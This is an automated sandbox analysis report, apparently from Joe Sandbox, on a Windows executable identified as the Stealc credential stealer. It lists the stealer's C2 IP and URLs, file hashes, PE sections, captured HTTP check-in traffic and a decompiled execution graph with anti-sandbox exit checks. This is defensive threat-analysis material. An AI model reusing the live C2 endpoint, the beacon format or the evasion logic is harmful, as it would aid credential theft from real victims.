                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php1Gfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://185.215.113.37file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  unknown
                  http://185.215.113.37/e2b1563c6670f193.phpUGfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    http://185.215.113.37/hfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      http://185.215.113.37/e2b1563c6670f193.php4file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.37/e2b1563c6670f193.phpyGDfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          http://185.215.113.37/wsfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          http://185.215.113.37/e2b1563c6670f193.php)Gfile.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://185.215.113.37tfile.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1540473
                              Start date and time:2024-10-23 20:03:09 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 11s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 87
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.16
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947877291970593
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'827'840 bytes
                              MD5:1d63962fa977f6d304646bb056c59d16
                              SHA1:7a7b2a8425fa3e601de7f51c6e3377b7f641d3e9
                              SHA256:b6f0f7c28a9b15f590c9a327464d2d562603fcbf246f03399cdc1234007d85e7
                              SHA512:e89908e46a5eaeac65f2f4bc2198c8b52e47b801c7b2e7bb7de095cdf9733bd6c122154843596144f4ccfd9ebebdd69e75954b54d462e674ad99d5c6a7feabef
                              SSDEEP:24576:7uAUIpw9Hx8nHFBOqnsJ9wu4hkcTHK8IwMUvTqAVmBQKm6THFp6KCKVEQu2Z+h:7u0qsHfmcJ51+wqQ+p6KCKOQut
                              TLSH:BA853336985CD465D88C74F84B8DDFD97320861EE4E746E7B8A437E7BC9CBD221A6040
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa8f000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FA49D148D8Ah
                              cmpps xmm3, dqword ptr [ebx], 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FA49D14AD85h
                              add byte ptr [esi], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edi], bl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], ch
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or byte ptr [eax+00000000h], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x22800a49ab84df369f80e9b8cbd4f26870660unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2970000x20015af610fbb49c674e31e4e72a00ed520unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              zdqimryq0x4f50000x1990000x1982005fc328435ce3709dfd3491fbc71e374cFalse0.9947830924578867COM executable for DOS7.953415844862702IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              aqqapoae0x68e0000x10000x400803c40019de324e235a12319af4caf5cFalse0.73828125data5.887789425043598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68f0000x30000x2200334c89854b05eb3090f9b53bb787e09cFalse0.05618106617647059DOS executable (COM)0.6786191517818762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              DLLImport
                              kernel32.dlllstrcpy
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-23T20:04:11.651073+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749700185.215.113.3780TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 23, 2024 20:04:10.434242010 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:10.439776897 CEST8049700185.215.113.37192.168.2.7
                              Oct 23, 2024 20:04:10.441736937 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:10.462238073 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:10.468069077 CEST8049700185.215.113.37192.168.2.7
                              Oct 23, 2024 20:04:11.357002974 CEST8049700185.215.113.37192.168.2.7
                              Oct 23, 2024 20:04:11.357121944 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:11.360687971 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:11.366863966 CEST8049700185.215.113.37192.168.2.7
                              Oct 23, 2024 20:04:11.651000023 CEST8049700185.215.113.37192.168.2.7
                              Oct 23, 2024 20:04:11.651072979 CEST4970080192.168.2.7185.215.113.37
                              Oct 23, 2024 20:04:14.584424019 CEST4970080192.168.2.7185.215.113.37
                              • 185.215.113.37
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749700185.215.113.37806488C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 23, 2024 20:04:10.462238073 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 23, 2024 20:04:11.357002974 CEST203INHTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 23, 2024 20:04:11.360687971 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 44 44 30 33 36 34 35 42 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a
                              Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="hwid"30DD03645BFB4109353171------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="build"doma------GDHIDHIEGIIIECAKEBFB--
                              Oct 23, 2024 20:04:11.651000023 CEST210INHTTP/1.1 200 OK
                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:4
                              Start time:14:04:05
                              Start date:23/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x80000
                              File size:1'827'840 bytes
                              MD5 hash:1D63962FA977F6D304646BB056C59D16
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:9.7%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
                                execution_graph 13079 969f0 13124 82260 13079->13124 13103 96a64 13104 9a9b0 4 API calls 13103->13104 13105 96a6b 13104->13105 13106 9a9b0 4 API calls 13105->13106 13107 96a72 13106->13107 13108 9a9b0 4 API calls 13107->13108 13109 96a79 13108->13109 13110 9a9b0 4 API calls 13109->13110 13111 96a80 13110->13111 13276 9a8a0 13111->13276 13113 96b0c 13280 96920 GetSystemTime 13113->13280 13114 96a89 13114->13113 13116 96ac2 OpenEventA 13114->13116 13118 96ad9 13116->13118 13119 96af5 CloseHandle Sleep 13116->13119 13123 96ae1 CreateEventA 13118->13123 13121 96b0a 13119->13121 13121->13114 13123->13113 13477 845c0 13124->13477 13126 82274 13127 845c0 2 API calls 13126->13127 13128 8228d 13127->13128 13129 845c0 2 API calls 13128->13129 13130 822a6 13129->13130 13131 845c0 2 API calls 13130->13131 13132 822bf 13131->13132 13133 845c0 2 API calls 13132->13133 13134 822d8 13133->13134 13135 845c0 2 API calls 13134->13135 13136 822f1 13135->13136 13137 845c0 2 API calls 13136->13137 13138 8230a 13137->13138 13139 845c0 2 API calls 13138->13139 13140 82323 13139->13140 13141 845c0 2 API calls 13140->13141 13142 8233c 13141->13142 13143 845c0 2 API calls 13142->13143 13144 82355 13143->13144 13145 845c0 2 API calls 13144->13145 13146 8236e 13145->13146 13147 845c0 2 API calls 13146->13147 13148 82387 13147->13148 13149 845c0 2 API calls 13148->13149 13150 823a0 13149->13150 13151 845c0 2 API calls 13150->13151 13152 823b9 13151->13152 13153 845c0 2 API calls 13152->13153 13154 823d2 13153->13154 13155 845c0 2 API calls 13154->13155 13156 823eb 13155->13156 13157 845c0 2 API calls 13156->13157 13158 82404 13157->13158 13159 845c0 2 API calls 13158->13159 13160 8241d 13159->13160 13161 845c0 2 API calls 13160->13161 13162 82436 13161->13162 13163 845c0 2 API calls 13162->13163 13164 8244f 13163->13164 13165 845c0 2 API calls 13164->13165 13166 82468 13165->13166 13167 845c0 2 API calls 13166->13167 13168 82481 13167->13168 13169 845c0 2 API calls 13168->13169 13170 8249a 13169->13170 13171 845c0 2 API calls 13170->13171 13172 824b3 13171->13172 13173 845c0 2 API calls 13172->13173 13174 824cc 13173->13174 13175 845c0 2 API calls 13174->13175 13176 824e5 13175->13176 13177 845c0 2 API calls 13176->13177 13178 824fe 13177->13178 13179 845c0 2 API calls 13178->13179 13180 82517 13179->13180 13181 845c0 2 API calls 13180->13181 13182 82530 13181->13182 13183 845c0 2 API calls 13182->13183 13184 82549 13183->13184 13185 845c0 2 API calls 13184->13185 13186 82562 13185->13186 13187 845c0 2 API calls 13186->13187 13188 8257b 13187->13188 13189 845c0 2 API calls 13188->13189 13190 82594 13189->13190 13191 845c0 2 API calls 13190->13191 13192 825ad 13191->13192 13193 845c0 2 API calls 13192->13193 13194 825c6 13193->13194 13195 845c0 2 API calls 13194->13195 13196 825df 13195->13196 13197 845c0 2 API calls 13196->13197 13198 825f8 13197->13198 13199 845c0 2 API calls 13198->13199 13200 82611 13199->13200 13201 845c0 2 API calls 13200->13201 13202 8262a 13201->13202 13203 845c0 2 API calls 13202->13203 13204 82643 13203->13204 13205 845c0 2 API calls 13204->13205 13206 8265c 13205->13206 13207 845c0 2 API calls 13206->13207 13208 82675 13207->13208 13209 845c0 2 API calls 13208->13209 13210 8268e 13209->13210 13211 99860 13210->13211 13482 99750 GetPEB 13211->13482 13213 99868 13214 99a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13213->13214 13217 9987a 13213->13217 13215 99b0d 13214->13215 13216 99af4 GetProcAddress 13214->13216 13219 99b46 13215->13219 13220 99b16 GetProcAddress GetProcAddress 13215->13220 13216->13215 13218 9988c 21 API calls 13217->13218 13218->13214 13221 99b68 13219->13221 13222 99b4f GetProcAddress 13219->13222 13220->13219 13223 99b89 13221->13223 13224 99b71 GetProcAddress 13221->13224 13222->13221 13225 96a00 13223->13225 13226 99b92 GetProcAddress GetProcAddress 13223->13226 13224->13223 13227 9a740 13225->13227 13226->13225 13228 9a750 13227->13228 13229 96a0d 13228->13229 13230 9a77e lstrcpy 13228->13230 13231 811d0 13229->13231 13230->13229 13232 811e8 13231->13232 13233 8120f ExitProcess 13232->13233 13234 81217 13232->13234 13235 81160 GetSystemInfo 13234->13235 13236 8117c ExitProcess 13235->13236 13237 81184 13235->13237 13238 81110 GetCurrentProcess VirtualAllocExNuma 13237->13238 13239 81149 13238->13239 13240 81141 ExitProcess 13238->13240 13483 810a0 VirtualAlloc 13239->13483 13243 81220 13487 989b0 13243->13487 13246 8129a 13249 96770 GetUserDefaultLangID 13246->13249 13247 81249 __aulldiv 13247->13246 13248 81292 ExitProcess 13247->13248 13250 967d3 13249->13250 13251 96792 13249->13251 13257 81190 13250->13257 13251->13250 13252 967cb ExitProcess 13251->13252 13253 967ad ExitProcess 13251->13253 13254 967c1 ExitProcess 13251->13254 13255 967a3 ExitProcess 13251->13255 13256 967b7 ExitProcess 13251->13256 13258 978e0 3 API calls 13257->13258 13259 8119e 13258->13259 13260 811cc 13259->13260 13261 97850 3 API calls 13259->13261 13264 97850 GetProcessHeap RtlAllocateHeap GetUserNameA 13260->13264 13262 811b7 13261->13262 13262->13260 13263 811c4 ExitProcess 13262->13263 13265 96a30 13264->13265 13266 978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13265->13266 13267 96a43 13266->13267 13268 9a9b0 13267->13268 13489 9a710 13268->13489 13270 9a9c1 lstrlen 13273 9a9e0 13270->13273 13271 9aa18 13490 9a7a0 13271->13490 13273->13271 13275 9a9fa lstrcpy lstrcat 13273->13275 13274 9aa24 13274->13103 13275->13271 13277 9a8bb 13276->13277 13278 9a90b 13277->13278 13279 9a8f9 lstrcpy 13277->13279 13278->13114 13279->13278 13494 96820 13280->13494 13282 9698e 13283 96998 sscanf 13282->13283 13523 9a800 13283->13523 13285 969aa SystemTimeToFileTime SystemTimeToFileTime 13286 969ce 13285->13286 13287 969e0 13285->13287 13286->13287 13288 969d8 ExitProcess 13286->13288 13289 95b10 13287->13289 13290 95b1d 13289->13290 13291 9a740 lstrcpy 13290->13291 13292 95b2e 13291->13292 13525 9a820 lstrlen 13292->13525 13295 9a820 2 API calls 13296 95b64 13295->13296 13297 9a820 2 API calls 13296->13297 13298 95b74 13297->13298 13529 96430 13298->13529 13301 9a820 2 API calls 13302 95b93 13301->13302 13303 9a820 2 API calls 13302->13303 13304 95ba0 13303->13304 13305 9a820 2 API calls 13304->13305 13306 95bad 13305->13306 13307 9a820 2 API calls 13306->13307 13308 95bf9 13307->13308 13538 826a0 13308->13538 13316 95cc3 13317 96430 lstrcpy 13316->13317 13318 95cd5 13317->13318 13319 9a7a0 lstrcpy 13318->13319 13320 95cf2 13319->13320 13321 9a9b0 4 API calls 13320->13321 13322 95d0a 13321->13322 13323 9a8a0 lstrcpy 13322->13323 13324 95d16 13323->13324 13325 9a9b0 4 API calls 13324->13325 13326 95d3a 13325->13326 13327 9a8a0 lstrcpy 13326->13327 13328 95d46 13327->13328 13329 9a9b0 4 API calls 13328->13329 13330 95d6a 13329->13330 13331 9a8a0 lstrcpy 13330->13331 13332 95d76 13331->13332 13333 9a740 lstrcpy 13332->13333 13334 95d9e 13333->13334 14264 97500 GetWindowsDirectoryA 13334->14264 13337 9a7a0 lstrcpy 13338 95db8 13337->13338 14274 84880 13338->14274 13340 95dbe 14419 917a0 13340->14419 13342 95dc6 13343 9a740 lstrcpy 13342->13343 13344 95de9 13343->13344 13345 81590 lstrcpy 13344->13345 13346 95dfd 13345->13346 14435 85960 13346->14435 13348 95e03 14579 91050 13348->14579 13350 95e0e 13351 9a740 lstrcpy 13350->13351 13352 95e32 13351->13352 13353 81590 lstrcpy 13352->13353 13354 95e46 13353->13354 13355 85960 34 API calls 13354->13355 13356 95e4c 13355->13356 14583 90d90 13356->14583 13358 95e57 13359 9a740 lstrcpy 13358->13359 13360 95e79 13359->13360 13361 81590 lstrcpy 13360->13361 13362 95e8d 13361->13362 13363 85960 34 API calls 13362->13363 13364 95e93 13363->13364 14590 90f40 13364->14590 13366 95e9e 13367 81590 lstrcpy 13366->13367 13368 95eb5 13367->13368 14595 91a10 13368->14595 13370 95eba 13371 9a740 lstrcpy 13370->13371 13372 95ed6 13371->13372 14939 84fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13372->14939 13374 95edb 13375 81590 lstrcpy 13374->13375 13376 95f5b 13375->13376 14946 90740 13376->14946 13378 95f60 13379 9a740 lstrcpy 13378->13379 13380 95f86 13379->13380 